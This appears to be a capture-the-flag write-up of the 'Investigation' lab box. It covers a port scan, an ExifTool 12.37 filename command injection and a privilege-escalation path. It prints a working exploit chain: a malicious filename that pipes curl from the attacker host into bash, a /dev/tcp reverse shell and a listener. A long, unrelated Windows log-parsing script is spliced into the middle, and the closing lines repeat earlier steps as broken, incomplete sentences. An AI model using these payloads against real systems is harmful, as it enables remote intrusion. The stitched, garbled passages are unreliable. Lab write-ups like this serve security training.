Open 10.129.11.68:22
Open 10.129.11.68:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Uploading an image will result in a report that you can view.
Example
ExifTool Version Number : 12.37
File Name : image.jpg
Directory : .
File Size : 335 bytes
File Modification Date/Time : 2023:01:23 20:03:07+00:00
File Access Date/Time : 2023:01:23 20:03:07+00:00
File Inode Change Date/Time : 2023:01:23 20:03:07+00:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Big-endian (Motorola, MM)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Y Cb Cr Positioning : Centered
DjVu Version : 0.24
Spatial Resolution : 300
Gamma : 2.2
Orientation : Horizontal (normal)
Warning : Ignored invalid metadata entry(s)
Image Width : 1
Image Height : 1
Encoding Process : Extended sequential DCT, arithmetic coding
Bits Per Sample : 8
Color Components : 1
Image Size : 1x1
Megapixels : 0.000001
Exploitation
Using the discovered vulnerability we will try to gain a shell on our target.
Exiftool 12.37
The report leaks the ExifTool version, 12.37. Versions before 12.38 hand the input filename to Perl's two-argument open(), so a filename that ends in a pipe character (|) is executed as a shell command and its output is read as the "image". Because the website runs ExifTool on the uploaded file under the name we supply, that gives us command execution as the web server user.
# Generate malicious filename (the trailing pipe is what makes ExifTool execute it)
cp image.jpg 'curl 10.10.14.71 | bash |'
# Generate an index.html containing our reverse shell code; this is what the curl above fetches
cat index.html
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.71/4444 0>&1"
# Host a webserver serving index.html
python -m http.server 80
# In another tab create a listener, then upload the renamed file through the website
pwncat-cs -lp 4444
Enumeration
After we receive our shell it's time to enumerate the system, as we are only the www-data user without any further permissions.
Linpeas
Linpeas shows a cronjob that runs regularly at a specific time and uses a script located in /usr/local/investigation.
Inside that folder we find an e-mail that contains a Windows Security Log, and the log contains a password.
Using that password we are able to switch from www-data to smorton.
su - smorton
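The log step above, as an added example that is not the writeup's own code: Windows Security Logs are .evtx files, and the usual offline route on Linux is to dump them to XML (for instance with python-evtx's evtx_dump.py, or Event Viewer's "Save As XML" on a Windows host) and then query the records. The script below parses that XML form, pulls the logon events (4624 success, 4625 failure, 4648 explicit credentials) with their account, domain, logon type and source address, and flags any account name not in a list of known accounts, which is where typos and stray credentials surface during triage. The sample records, host name and account names are constructed for the example, not taken from the box.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Logon-related Security event IDs worth pulling first during triage.
LOGON_EVENTS = {
    4624: "successful logon",
    4625: "failed logon",
    4648: "logon with explicit credentials",
}

# Constructed sample in the XML form evtx_dump.py / Event Viewer produce.
# Three records: a failed logon, a successful one, and a 4672 that is not a
# logon event and must be filtered out.
SAMPLE_XML = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4625</EventID>
    <TimeCreated SystemTime="2022-08-01T09:57:44.000Z"/>
    <Computer>WS01.example.test</Computer>
  </System>
  <EventData>
    <Data Name="TargetUserName">typed-in-the-wrong-box</Data>
    <Data Name="TargetDomainName">EXAMPLE</Data>
    <Data Name="LogonType">2</Data>
    <Data Name="IpAddress">-</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4624</EventID>
    <TimeCreated SystemTime="2022-08-01T09:58:01.000Z"/>
    <Computer>WS01.example.test</Computer>
  </System>
  <EventData>
    <Data Name="TargetUserName">smorton</Data>
    <Data Name="TargetDomainName">EXAMPLE</Data>
    <Data Name="LogonType">2</Data>
    <Data Name="IpAddress">-</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4672</EventID>
    <TimeCreated SystemTime="2022-08-01T09:58:01.000Z"/>
    <Computer>WS01.example.test</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserName">smorton</Data>
  </EventData>
</Event>
</Events>
"""


def parse_events(xml_text: str):
    """Flatten every <Event> into a dict: event_id, time, computer plus all EventData fields."""
    root = ET.fromstring(xml_text)
    records = []
    for ev in root.iter("{%s}Event" % NS["e"]):
        system = ev.find("e:System", NS)
        rec = {
            "event_id": int(system.findtext("e:EventID", namespaces=NS)),
            "time": system.find("e:TimeCreated", NS).get("SystemTime"),
            "computer": system.findtext("e:Computer", default="", namespaces=NS),
        }
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = (d.text or "").strip()
        records.append(rec)
    return records


def logon_events(records):
    """(time, id, meaning, account, domain, logon type, source IP) for logon-related events."""
    return [
        (r["time"], r["event_id"], LOGON_EVENTS[r["event_id"]],
         r.get("TargetUserName", ""), r.get("TargetDomainName", ""),
         r.get("LogonType", ""), r.get("IpAddress", ""))
        for r in records if r["event_id"] in LOGON_EVENTS
    ]


def unexpected_accounts(records, known_accounts):
    """Account names in logon events that are not known accounts (case-insensitive)."""
    known = {a.lower() for a in known_accounts}
    seen = {r.get("TargetUserName", "") for r in records if r["event_id"] in LOGON_EVENTS}
    return sorted(a for a in seen if a.lower() not in known)


if __name__ == "__main__":
    recs = parse_events(SAMPLE_XML)
    for row in logon_events(recs):
        print(*row, sep="\t")
    print("unexpected:", unexpected_accounts(recs, ["smorton", "Administrator"]))
```

On a real dump, replace SAMPLE_XML with the file contents and feed the account list from the machine's known users; anything left in the unexpected list deserves a look before moving on.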
Privilege Escalation
Enumeration
Checking the sudo permissions of smorton reveals that we are able to run /usr/bin/binary as root without a password.
smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
Analyzing /usr/bin/binary
Executing the binary only prints the text Exiting...
Checking the website we notice a service they offer, located at .
The service is described as Image Forensics: you can upload an image file and they provide a detailed forensic analysis.
The first line of the report shows the ExifTool version in use, 12.37. If you look this up you'll come across
We pull that binary to our machine and use to take a look at the decompiled code.